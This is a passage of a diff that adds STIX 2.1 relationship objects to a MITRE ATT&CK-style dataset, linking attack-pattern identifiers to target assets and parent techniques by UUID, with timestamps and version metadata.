"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6021cdb-4532-4152-abb0-a46c0437228e", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6190a85-4fb6-4587-98ba-f6c060a6ca99", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a625d870-e22e-40e8-9678-da03852102ba", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6270b8b-89b1-484f-9da9-a1111c74ad11", + "created": "2020-02-11T19:01:16.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a63c4621-6bc6-464b-8dc4-1d9edc2c8bde", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a65168e4-b74f-4593-911f-dcf21b27372c", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6614d26-6314-4e80-8e94-d0462ed76e12", + "created": "2024-06-27T09:02:03.357Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:02:03.357Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a667ccd7-2df9-41ee-9e8d-048b8b2d1a99", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6782432-e01f-4491-bebe-3fb8f8e8b7fe", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a68b4be7-ba3b-44f6-8034-ebaaea0ce45c", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6baf58a-f679-4ba7-abfd-4e1e67ad407b", + "created": "2020-02-21T21:08:26.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6c866b5-180a-48ec-b2e4-fa4230af4249", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6e24cf3-a00e-43f7-a29c-28ed00e46ca1", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6e77d6e-a76d-446c-a8ac-03b48892b7cb", + "created": "2020-02-20T22:06:41.878Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6e9bbe1-3e59-45c0-987a-b5354d602dc7", + "created": "2023-09-29T17:05:56.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:05:56.185Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6ee4e6e-e20f-4741-93cc-e54344cfe1af", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a6f0c9d2-ae40-4dee-9231-4f6fa3d87b00", + "created": "2020-03-13T13:51:58.704Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a726178e-c9ae-4ba0-aca8-8cf77fd27667", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a72c212f-6d4f-4c5d-873d-afa42021024c", + "created": "2024-03-26T15:42:10.203Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-26T15:42:10.203Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a72f9e78-41af-40c7-bce3-9e1e21d956e2", + "created": "2020-01-24T14:47:41.988Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a7358d58-89ce-4887-9c3f-9f06a334ceb3", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a74ee3f0-3b38-4113-9f40-d721fb36b711", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a7582c07-323b-4426-8286-e60fe82eb923", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a77385d4-63bf-43d4-9ce1-aec5bdf581cd", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a7746866-19bd-4a08-bcbd-16385b68f270", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a7a2790e-d5ba-4a46-bde3-c698c6ae52ac", + "created": "2023-09-28T19:41:16.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:41:16.927Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a7e4dfc8-ffff-4675-8f14-9d84bbd65de8", + "created": "2024-06-26T14:47:04.969Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:47:04.969Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--800f9819-7007-4540-a520-40e655876800", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a82f87c7-90ba-45b0-aecd-5d67f3a806a6", + "created": "2024-06-27T08:51:58.575Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:51:58.575Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a83af498-6132-4b44-a258-4f64aa30df9f", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a84505eb-975b-49b2-be9a-d297782babae", + "created": "2024-06-26T15:03:30.647Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:03:30.647Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a84a1d44-0a34-4fd3-a3e1-bf18e4ff4620", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a84dd2f5-d4f4-44c1-ba51-4804f40576e1", + "created": "2023-09-28T20:28:27.970Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:28:27.970Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8599a50-ab69-4eb5-9fbd-040e910ee36f", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a86592dc-42c9-4f7d-b629-ccf67ff9f927", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8689b2d-917b-432d-97ea-7b06a2da0bee", + "created": "2020-02-11T18:30:21.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39", + "target_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a86e40b2-0ee0-4f70-b32f-80b1bcde9948", + "created": "2022-08-30T14:17:01.017Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-08-30T14:17:01.017Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a87988a6-a189-432f-bf67-52810757dba6", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a882fc22-c0ff-4f8f-9661-9f75d5dfd400", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8a614bf-ff22-48c6-a5f4-30d3e6f47a86", + "created": "2024-07-02T13:55:55.755Z", + 